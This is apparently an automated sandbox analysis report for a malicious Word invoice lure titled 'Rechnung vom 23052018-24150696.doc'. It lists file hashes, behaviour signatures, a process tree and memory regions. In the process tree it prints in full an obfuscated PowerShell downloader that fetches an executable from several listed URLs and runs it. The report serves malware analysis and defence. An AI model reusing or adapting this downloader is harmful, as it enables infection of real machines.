Analysis

  • max time kernel
    118s
  • max time network
    119s
  • platform
    windows7_x64
  • resource
    win7-20240508-en
  • resource tags

    arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system
  • submitted
    20-05-2024 19:04

General

  • Target

    Rechnung vom 23052018-24150696.doc

  • Size

    152KB

  • MD5

    955551ca0435e0c9f66be5bf158365cb

  • SHA1

    de46964bf4286e03aa711d0aef31a81b2fa38ac3

  • SHA256

    e6f40a6977cf534fb6f7f7296384726b628469dd3145158ba32effbcb87065b1

  • SHA512

    3c958dde58f4c1771b43a101446ec46ef5037519365c2cff11e33008443b874971ae047e23e9060d48294e5bb038e4b7dab35f1922e9cdb871d9dc127d99536e

  • SSDEEP

    1536:NZCVT5jYOcYkgPn+ahdlKXsM8eWlz9+IJAYD+o2HqRAx6lRExbiR0u1WkemUT5:eVtjCPgPVBz9ty/HU46l66W195

Score
10/10

Malware Config

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 6 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Rechnung vom 23052018-24150696.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2740
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2068
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe
        Powershell ((' ((dy4pt3ns'+'dy4+dy4adasd = &(sdy4+dy4yXdy4+dy4nsdy4+dy4yX+syXesyXdy4+dy4+syXw-ody4+dy4bdy4+dy4jecdy4+dy4syX+sdy4+dy4yXtsyX) dy4+dy'+'4random;pt3YYU dy4+dy4= .('+'syXndy4+dy4esyX+dy4+dy4syXwdy4+dy4syX+'+'syX-objectsyXdy4+dy4) Systemdy4+dy4.Net.Web'+'Client;ptdy4+dy43NSB dy4+dy4=dy4+dy4 ptdy4+dy43nsdy4+dy4adasddy4+dy4.next(1dy4+dy40000,dy4+d'+'y4 dy4+dy428213dy4+dy43)dy4+dy4;dy4+dy4pdy'+'4+dy4t3ADCdy4+dy4Xdy4+'+'dy4 =dy4+dy4 syX htdy4+dy4tdy4+dy4p://dy4+dy4easldy4+dy4edy4+dy4y'+'sdy4+dy4c.net/G3FPmzI8z7/@http://officemindy4+dy4am'+'i.net/955ndy4+dy4KPdy4+dy4/dy4+dy4@http://dy4+dy4visual-sounds.cdy4+dy4om/ssfm/XGKaud3/@htdy4+'+'dy4tp://logo-grafidy4+dy4k.de/cfpraC3'+'j/@http://chris-d'+'dy4+dy4ark.cdy4+dy4om/Ddy4+dy4OXxdy4+dy4tdy4+dy49Ndy4+dy4Rdy4+dy4/s'+'yX.Splidy4+dy4t(dy4+dy4sydy4+dy4Xdy4+dy4@dy4+dy'+'4syX);pt3dy4+dy4Sdy4+dy4DC'+'dy4+dy4 dy4+dy4= dy4+dy4pdy4+dy4tdy4+dy43env:dy4+dy4pdy4+dy4udy4+dy4bdy4+'+'dy4lic'+' + sdy4+dy4yXf5ms'+'yX + '+'ptdy4+dy43NSB +dy4+dy4 (syXdy4+dy4.exdy4+dy'+'4sydy4+dy4X'+'+syXesdy4+dy4yX);foreachdy4+dy4(pt3dy4+dy4asdy4+dy4fc in pdy4+dy4t3Ady4+dy4DCdy4+dy4X){try{ptdy4'+'+dy43YYU.sR6Ddy4+dy'+'4oS69WnlS69OadFISdy4+dy469lesR6dy4+dy4(pdy4+dy4t3asdy4+dy4fc.sR6ToStrS69iS69dy4+dy4Ndy4+dy4g'+'sR6(), pdy4+dy4t3SDC);&dy4+dy4(syXInvosyX+syXksyX+sydy4+dy4Xe-ItemsyXdy4+dy4)dy4+dy4(pt3SDC);break;}cady4+dy4tch{}}dy4) -CreplAce ([ChaR]83+[ChaR]54+[ChaR]57),[ChaR]96-CreplAce dy4pt3dy4,[ChaR]36-rEplaC'+'e ([Cha'+'R]115+[ChaR]82+[ChaR'+']54),[ChaR]34-rEplaCe([ChaR]115+['+'ChaR]121+[ChaR]88),[ChaR]39 -rEplaCe ([ChaR]102+[ChaR]'+'53+[ChaR]1'+'09),[ChaR]92) Vku& ( ([STrIng]bugVErBosEpreFErEnCE)[1,3]+dy4Xdy4-jOiNdy4dy4)') -repLaCe 'bug',[cHaR]36-repLaCe 'dy4',[cHaR]39 -creplaCE'Vku',[cHaR]124)|.((VarIAble '*mDr*').name[3,11,2]-Join'')
        2⤵
        • Process spawned unexpected child process
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:268

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

      Filesize

      20KB

      MD5

      89b27b97030c36bd468af9cf7b4aa993

      SHA1

      bfec9e334e71dc058f8d223d6af4c4eca3d858ca

      SHA256

      57a23fe8b69540692904d7bc72c6665da1457a9f5680232946a6a74a1dd7b1ef

      SHA512

      2c63c18233f593a136656e4ba6527f7a84358d68f99df0e50b15006db692a8d43956fe756c5b3ff7937ef61f856a69fb25604523596ef65593fe0a038ee4aa38

    • memory/2740-0-0x000000002FC11000-0x000000002FC12000-memory.dmp

      Filesize

      4KB

    • memory/2740-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2740-2-0x000000007174D000-0x0000000071758000-memory.dmp

      Filesize

      44KB

    • memory/2740-6-0x0000000000550000-0x0000000000650000-memory.dmp

      Filesize

      1024KB

    • memory/2740-8-0x0000000000550000-0x0000000000650000-memory.dmp

      Filesize

      1024KB

    • memory/2740-10-0x0000000000550000-0x0000000000650000-memory.dmp

      Filesize

      1024KB

    • memory/2740-13-0x0000000000550000-0x0000000000650000-memory.dmp

      Filesize

      1024KB

    • memory/2740-12-0x0000000000550000-0x0000000000650000-memory.dmp

      Filesize

      1024KB

    • memory/2740-15-0x0000000000550000-0x0000000000650000-memory.dmp

      Filesize

      1024KB

    • memory/2740-16-0x0000000000550000-0x0000000000650000-memory.dmp

      Filesize

      1024KB

    • memory/2740-11-0x0000000000550000-0x0000000000650000-memory.dmp

      Filesize

      1024KB

    • memory/2740-9-0x0000000000550000-0x0000000000650000-memory.dmp

      Filesize

      1024KB

    • memory/2740-7-0x0000000000550000-0x0000000000650000-memory.dmp

      Filesize

      1024KB

    • memory/2740-17-0x0000000000550000-0x0000000000650000-memory.dmp

      Filesize

      1024KB

    • memory/2740-60-0x0000000000550000-0x0000000000650000-memory.dmp

      Filesize

      1024KB

    • memory/2740-83-0x0000000000550000-0x0000000000650000-memory.dmp

      Filesize

      1024KB

    • memory/2740-82-0x0000000000550000-0x0000000000650000-memory.dmp

      Filesize

      1024KB

    • memory/2740-73-0x0000000000550000-0x0000000000650000-memory.dmp

      Filesize

      1024KB

    • memory/2740-71-0x0000000000550000-0x0000000000650000-memory.dmp

      Filesize

      1024KB

    • memory/2740-70-0x0000000000550000-0x0000000000650000-memory.dmp

      Filesize

      1024KB

    • memory/2740-69-0x0000000000550000-0x0000000000650000-memory.dmp

      Filesize

      1024KB

    • memory/2740-68-0x0000000000550000-0x0000000000650000-memory.dmp

      Filesize

      1024KB

    • memory/2740-67-0x0000000000550000-0x0000000000650000-memory.dmp

      Filesize

      1024KB

    • memory/2740-66-0x0000000000550000-0x0000000000650000-memory.dmp

      Filesize

      1024KB

    • memory/2740-65-0x0000000000550000-0x0000000000650000-memory.dmp

      Filesize

      1024KB

    • memory/2740-64-0x0000000000550000-0x0000000000650000-memory.dmp

      Filesize

      1024KB

    • memory/2740-63-0x0000000000550000-0x0000000000650000-memory.dmp

      Filesize

      1024KB

    • memory/2740-62-0x0000000000550000-0x0000000000650000-memory.dmp

      Filesize

      1024KB

    • memory/2740-61-0x0000000000550000-0x0000000000650000-memory.dmp

      Filesize

      1024KB

    • memory/2740-59-0x0000000000550000-0x0000000000650000-memory.dmp

      Filesize

      1024KB

    • memory/2740-58-0x0000000000550000-0x0000000000650000-memory.dmp

      Filesize

      1024KB

    • memory/2740-56-0x0000000000550000-0x0000000000650000-memory.dmp

      Filesize

      1024KB

    • memory/2740-55-0x0000000000550000-0x0000000000650000-memory.dmp

      Filesize

      1024KB

    • memory/2740-54-0x0000000000550000-0x0000000000650000-memory.dmp

      Filesize

      1024KB

    • memory/2740-53-0x0000000000550000-0x0000000000650000-memory.dmp

      Filesize

      1024KB

    • memory/2740-52-0x0000000000550000-0x0000000000650000-memory.dmp

      Filesize

      1024KB

    • memory/2740-51-0x0000000000550000-0x0000000000650000-memory.dmp

      Filesize

      1024KB

    • memory/2740-49-0x0000000000550000-0x0000000000650000-memory.dmp

      Filesize

      1024KB

    • memory/2740-48-0x0000000000550000-0x0000000000650000-memory.dmp

      Filesize

      1024KB

    • memory/2740-46-0x0000000000550000-0x0000000000650000-memory.dmp

      Filesize

      1024KB

    • memory/2740-45-0x0000000000550000-0x0000000000650000-memory.dmp

      Filesize

      1024KB

    • memory/2740-44-0x0000000000550000-0x0000000000650000-memory.dmp

      Filesize

      1024KB

    • memory/2740-43-0x0000000000550000-0x0000000000650000-memory.dmp

      Filesize

      1024KB

    • memory/2740-42-0x0000000000550000-0x0000000000650000-memory.dmp

      Filesize

      1024KB

    • memory/2740-41-0x0000000000550000-0x0000000000650000-memory.dmp

      Filesize

      1024KB

    • memory/2740-40-0x0000000000550000-0x0000000000650000-memory.dmp

      Filesize

      1024KB

    • memory/2740-39-0x0000000000550000-0x0000000000650000-memory.dmp

      Filesize

      1024KB

    • memory/2740-38-0x0000000000550000-0x0000000000650000-memory.dmp

      Filesize

      1024KB

    • memory/2740-37-0x0000000000550000-0x0000000000650000-memory.dmp

      Filesize

      1024KB

    • memory/2740-36-0x0000000000550000-0x0000000000650000-memory.dmp

      Filesize

      1024KB

    • memory/2740-35-0x0000000000550000-0x0000000000650000-memory.dmp

      Filesize

      1024KB

    • memory/2740-34-0x0000000000550000-0x0000000000650000-memory.dmp

      Filesize

      1024KB

    • memory/2740-33-0x0000000000550000-0x0000000000650000-memory.dmp

      Filesize

      1024KB

    • memory/2740-32-0x0000000000550000-0x0000000000650000-memory.dmp

      Filesize

      1024KB

    • memory/2740-31-0x0000000000550000-0x0000000000650000-memory.dmp

      Filesize

      1024KB

    • memory/2740-30-0x0000000000550000-0x0000000000650000-memory.dmp

      Filesize

      1024KB

    • memory/2740-47-0x0000000000550000-0x0000000000650000-memory.dmp

      Filesize

      1024KB

    • memory/2740-29-0x0000000000550000-0x0000000000650000-memory.dmp

      Filesize

      1024KB

    • memory/2740-28-0x0000000000550000-0x0000000000650000-memory.dmp

      Filesize

      1024KB

    • memory/2740-27-0x0000000000550000-0x0000000000650000-memory.dmp

      Filesize

      1024KB

    • memory/2740-26-0x0000000000550000-0x0000000000650000-memory.dmp

      Filesize

      1024KB

    • memory/2740-25-0x0000000000550000-0x0000000000650000-memory.dmp

      Filesize

      1024KB

    • memory/2740-24-0x0000000000550000-0x0000000000650000-memory.dmp

      Filesize

      1024KB

    • memory/2740-23-0x0000000000550000-0x0000000000650000-memory.dmp

      Filesize

      1024KB

    • memory/2740-22-0x0000000000550000-0x0000000000650000-memory.dmp

      Filesize

      1024KB

    • memory/2740-21-0x0000000000550000-0x0000000000650000-memory.dmp

      Filesize

      1024KB

    • memory/2740-20-0x0000000000550000-0x0000000000650000-memory.dmp

      Filesize

      1024KB

    • memory/2740-19-0x0000000000550000-0x0000000000650000-memory.dmp

      Filesize

      1024KB

    • memory/2740-18-0x0000000000550000-0x0000000000650000-memory.dmp

      Filesize

      1024KB

    • memory/2740-101-0x000000007174D000-0x0000000071758000-memory.dmp

      Filesize

      44KB

    • memory/2740-102-0x0000000000550000-0x0000000000650000-memory.dmp

      Filesize

      1024KB

    • memory/2740-118-0x000000007174D000-0x0000000071758000-memory.dmp

      Filesize

      44KB